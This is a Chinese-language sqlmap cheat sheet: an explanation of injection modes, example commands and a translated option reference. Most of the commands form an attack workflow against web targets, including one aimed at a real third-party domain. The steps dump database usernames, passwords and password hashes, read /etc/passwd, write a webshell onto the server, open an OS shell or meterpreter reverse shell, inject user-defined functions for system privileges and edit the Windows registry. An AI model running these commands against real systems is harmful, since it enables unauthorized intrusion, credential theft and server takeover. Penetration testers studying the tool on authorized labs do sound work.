Sqlmap

sqlmap简介

sqlmap支持五种不同的注入模式:

  • 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
  • 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
  • 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
  • 4、联合查询注入,可以使用union的情况下的注入。
  • 5、堆查询注入,可以同时执行多条语句的执行时的注入。

sqlmap支持的数据库有

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

检测注入

基本格式

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”

默认使用level1检测全部数据库类型

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

跟随302跳转

当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302,
当注入错误的时候,先报错再跳转的时候,不需要跟随302。
目的就是:要追踪到错误信息。

cookie注入

当程序有防get注入的时候,可以使用cookie注入

1
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)

从post数据包中注入

可以使用burpsuite或者temperdata等工具来抓取post包

1
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql   指定username参数

注入成功后

获取数据库基本信息

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 –dbs

查询有哪些数据库

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test –tables

查询test数据库中有哪些表

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin –columns

查询test数据库中admin表有哪些字段

1
sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

dump出字段username与password中的数据

其他命令参考下面

从数据库中搜索字段

1
sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

在dedecms数据库中搜索字段admin或者password。

读取与写入文件

首先找需要网站的物理路径,其次需要有可写或可读权限。

–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

使用shell命令:

sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下来指定网站可写目录:
“E:\php\htdocs\dvwa”

注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)

SQLMAP基础信息

获取当前用户名称

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-user

获取当前数据库名称

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db

获取表名

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables

获取字段

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns

获取字段内容

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C id --dump

SQLMAP进阶信息内容

执行测试等级

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --level 2

指定数据库类型

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbms "Mysql"

列数据库用户

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --users

列数据库

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs

数据库用户密码

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords

列出指定用户数据库密码

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords -U root

查看权限

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges

查看指定用户权限

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges -U root

是否是数据库管理员

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --is-dba

枚举数据库用户角色

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --roles

导入用户自定义函数(获取系统权限!)

1
sqlmap/sqlmap.py -u "http://url/news?id=1"   --udf-inject

cookie注入

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --cookie "COOKIE_VALUE"

获取banner信息

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -b

post注入

1
python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3"

指纹判别数据库类型

1
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -f

代理注入

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"  --proxy"http://127.0.0.1:8118"

指定关键词

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"

执行系统命令

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --file /etc/passwd

统交互shell

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-shell

反弹shell

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-pwn

读取win系统注册表

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"   --reg-read

保存进度

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs-o "sqlmap.log"

恢复已保存进度

1
python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs  -o "sqlmap.log" --resume

sqlmap详细命令:

1
2
3
4
5
6
7
8
9
–is-dba 当前用户权限(是否为root权限)
–dbs 所有数据库
–current-db 网站当前数据库
–users 所有数据库用户
–current-user 当前数据库用户
–random-agent 构造随机user-agent
–passwords 数据库密码
–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
–time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)

Options(选项):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-h, --help 显示基本帮助信息

-hh

显示高级帮助信息

--version 显示程序版本号

-v VERBOSE 赘言级别:0-6(默认 1)

目标:

-d DIRECT 直接连接到数据库

-u URL, --url=URL 目标 URL(e.g. "www.target.com/vuln.php?id=1")

-l LOGFILE 从 Burp 或 WebScarab 日志中解析目标

-m BULKFILE

在给定的文本文件中读取多个扫描目标

-g GOOGLEDORK 将 Google dork 结果作为目标 URL

-r REQUESTFILE 从文件中读取 HTTP 请求

-c CONFIGFILE 从 INI 配置文件中读取配置选项
  • 保存进度继续跑:
1
2
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度

Target(目标):

以下至少需要设置其中一个选项,设置目标URL。

1
2
3
4
5
6
-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标URL。
-l LIST 从Burp或WebScarab代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入HTTP请求。
-g GOOGLEDORK 处理Google dork的结果作为目标URL。
-c CONFIGFILE 从INI配置文件中加载选项。

Request(请求):

这些选项可以用来指定如何连接到目标URL。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
--data=DATA 通过 POST 方法提交的数据字符串--param-del=PDEL 用于分割参数值的字符
--cookie=COOKIE HTTP Cookie 头
--cookie-del=CDEL 用于分割 cookie 值的字符
--load-cookies=L.. 包含 cookies 的 Netscape/wget 格式文件
--drop-set-cookie 忽略响应中的 Set-Cookie 头
--user-agent=AGENT
HTTP User-Agent 头
--random-agent 使用随机选择的 HTTP User-Agent 头
--host=HOST HTTP Host 头
--referer=REFERER HTTP Referer 头
--headers=HEADERS Extra 头(e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP 认证方式(Basic, Digest, NTLM 或 PKI)
--auth-cred=AUTH.. HTTP 认证证书(name:password)
--auth-private=A.. HTTP 认证 PEM 私钥文件
--proxy=PROXY 使用代理连接目标 URL
--proxy-cred=PRO.. 代理认证证书(name:password)
--proxy-file=PRO.. 从文件读取代理列表
--ignore-proxy 接受系统默认代理设置
--tor 使用 Tor 匿名网络
--tor-port=TORPORT 设置默认以外的 Tor 代理端口
--tor-type=TORTYPE 设置 Tor 代理方式(HTTP(默认), SOCKS4 或
SOCKS5)
--check-tor 检查 Tor 是否正确使用--delay=DELAY 每个 HTTP 请求之间延迟的秒数
--timeout=TIMEOUT 认定连接超时的秒数(默认 30)
--retries=RETRIES 超时重试的次数(默认 3)
--randomize=RPARAM 随机改变给定参数的值
--safe-url=SAFURL 设置一个安全链接供系统经常访问
--safe-freq=SAFREQ 设置一个安全连接供系统在两次测试之间访问
--skip-urlencode 不对攻击载荷数据进行 URL 编码
--force-ssl

Enumeration(枚举):

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行
您自己的SQL语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
-a, --all 检索一切
-b, --banner 检索 DBMS banner 信息
--current-user 检索 DBMS 当前用户
--current-db 检索 DBMS 当前数据库
--hostname检索 DBMS 服务器主机名
--is-dba 检测当前用户是否是 DBA
--users枚举 DBMS 用户名
--passwords枚举 DBMS 用户密码哈希
--privileges 枚举 DBMS 用户权限
--roles枚举 DBMS 用户角色
--dbs 枚举 DBMS 数据库
--tables 枚举 DBMS 数据库表--columns 枚举 DBMS 数据库表字段
--schema 枚举 DBMS 架构
--count检索数据表中的条目数
--dump 转储 DBMS 数据库表中的条目
--dump-all 转储所有 DBMS 数据库表中的条目
--search 搜索字段名, 表名和(或)库名
--comments 检索 DBMS 注释
-D DB DBMS 数据库
-T TBL DBMS 数据库表
-C COL DBMS 数据库表字段
-X EXCLUDECOL 不枚举 DBMS 数据库表字段
-U USER DBMS 用户
--exclude-sysdbs 枚举数据库表时排除 DBMS 系统库
--where=DUMPWHERE 转储数据表时使用 WHERE 条件
--start=LIMITSTART 第一个查询的输出项检索
--stop=LIMITSTOP 最后一个查询的输出项检索
--first=FIRSTCHAR 第一个查询的输出字的字符检索
--last=LASTCHAR 最后一个查询的输出字的字符检索
--sql-query=QUERY 要执行的 SQL 语句
--sql-shell返回交互式的 SQL shell
--sql-file=SQLFILE 从给定的文件执行 SQL 语句强制暴破
--common-tables 检查是否存在常见表
--common-columns 检查是否存在常见字段

Optimization(优化):

这些选项可用于优化SqlMap的性能。

1
2
3
4
5
6
7
8
9
-o 开启所有优化开关

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection 从没有实际的HTTP响应体中检索页面长度

–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)

Injection(注入):

这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。

1
2
3
4
5
6
7
8
9
10
11
12
-p TESTPARAMETER 测试参数
--skip=SKIP跳过对给定参数的测试
--dbms=DBMS在这里强制指定后端 DBMS--dbms-cred=DBMS.. DBMS 认证证书(user:password)
--os=OS在这里强制后端 DBMS 操作系统
--invalid-bignum 使用大数字无效化值
--invalid-logical 使用逻辑运算无效化值
--invalid-string 使用随机字符串无效化值
--no-cast 关闭攻击载荷铸造机制
--no-escape 关闭字符串逃逸机制
--prefix=PREFIX 注入攻击载荷前缀字符串
--suffix=SUFFIX 注入攻击载荷后缀字符串
--tamper=TAMPER使用给定的脚本篡改注入数据

Detection(检测):

这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

1
2
3
4
5
6
7
8
--level=LEVEL 执行测试的等级(1-5, 默认 1)
--risk=RISK 执行测试的风险(0-3, 默认 1)
--string=STRING 查询被评估为 True 时的匹配字符串
--not-string=NOT.. 查询被评估为 False 时的匹配字符串
--regexp=REGEXP 查询被评估为 True 时的正则表达式
--code=CODE 查询被评估为 True 时的 HTTP 代码
--text-only 仅基于文本内容比较网页
--titles 仅基于标题比较网页

Techniques(技巧):

这些选项可用于调整具体的SQL注入测试。

1
2
3
4
5
6
--technique=TECH 使用的 SQL 注入技术(默认使用所有技术)--time-sec=TIMESEC DBMS 响应的延迟秒数(默认 5)
--union-cols=UCOLS UNION 查询注入测试字段的范围
--union-char=UCHAR 暴破字段数量使用的字符
--union-from=UFROM UNION 查询注入 FROM 部分使用的数据表
--dns-domain=DNS.. DNS 溢出攻击所使用的域名
--second-order=S.. 二阶响应页面 URL

Fingerprint(指纹):

1
-f, --fingerprint 执行检查广泛的DBMS版本指纹

用户定义函数注入:

1
2
3
--udf-inject 注入用户自定义函数

--shared-lib=SHLIB 共享库的本地路径

Brute force(蛮力):

这些选项可以被用来运行蛮力检查。

1
2
3
–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。

1
2
–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径

强制使用 SSL/HTTPS

1
2
3
4
5
--hpp 使用 HTTP 参数污染

--eval=EVALCODE 供提交请求之前评估参数的 Python 代码(e.g.

"import hashlib;id2=hashlib.md5(id).hexdigest()")

File system access(访问文件系统):

这些选项可以被用来访问后端数据库管理系统的底层文件系统。

1
2
3
4
5
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件

–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件

–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

Operating system access(操作系统访问):

这些选项可以用于访问后端数据库管理系统的底层操作系统。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取一个OOB shell,meterpreter或VNC

–os-smbrelay 一键获取一个OOB shell,meterpreter或VNC

–os-bof 存储过程缓冲区溢出利用

–priv-esc 数据库进程用户权限提升

–msf-path=MSFPATH Metasploit Framework本地的安装路径

–tmp-path=TMPPATH 远程临时文件目录的绝对路径

Windows注册表访问:

这些选项可以被用来访问后端数据库管理系统Windows注册表。

1
2
3
4
5
6
7
8
9
10
11
12
13
–reg-read 读一个Windows注册表项值

–reg-add 写一个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA Windows注册表键值数据

–reg-type=REGTYPE Windows注册表项值类型

这些选项可以用来设置一些一般的工作参数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
-s SESSIONFILE 从存储(.sqlite)文件中读取会话
-t TRAFFICFILE 记录所有 HTTP 流量为一个文本文件
--batch
从不询问用户输入, 使用默认行为
--charset=CHARSET 强制数据检索使用的字符编码
--crawl=CRAWLDEPTH 从目标 URL 抓取起始网页
--csv-del=CSVDEL CSV 输出中使用的定界符(默认",")
--dump-format=DU.. 转储数据的格式(CSV(默认), 可以设置为 HTML
或 SQLITE)
--eta 显示每个输出的预计到达时间
--flush-session 刷新当前目标的会话文件
--forms
分析并测试目标 URL 中的表单
--fresh-queries 忽略在会话文件中存储的查询结果
--hex 对数据检索使用 DBMS 的 hex 函数
--output-dir=OUT.. 自定义输出目录路径--parse-errors 从响应中分析并显示 DBMS 错误消息
--pivot-column=P.. 透视字段
--save 保存选项到 INI 配置文件
--scope=SCOPE 用正则表达式从所提供的代理日志过滤目标
--test-filter=TE.. 通过攻击载荷和(或)标题选择测试(e.g. ROW)
--update 更新 sqlmap

Miscellaneous(杂项):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
-z MNEMONICS 使用短记忆法(e.g. "flu,bat,ban,tec=EU")
--alert=ALERT 当找到 SQL 注入时运行操作系统命令
--answers=ANSWERS 设置问题的答案(e.g. "quit=N,follow=N")
--beep 当找到 SQL 注入时发出蜂鸣
--check-waf 启发式检查 WAF/IPS/IDS 保护
--cleanup 从 sqlmap 具体 UDF 和表清理 DBMS
--dependencies 检查是否缺少(非核心)的 sqlmap 的依赖
--disable-coloring 禁用控制台输出着色
--gpage=GOOGLEPAGE 从指定页码使用 Google dork 结果
--identify-waf 使测试通过 WAF/IPS/IDS 保护
--mobile 通过 HTTP User-Agent 头模拟智能手机
--page-rank 为 Google dork 结果显示网页排名(PR)
–forms 对目标URL的解析和测试形式
–parse-errors 从响应页面解析数据库管理系统的错误消息
–replicate 复制转储的数据到一个sqlite3数据库
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
--purge-output 从输出目录中安全删除所有内容
--smart 仅通过积极的启发式进行测试
--wizard 用于初级用户的简单向导接口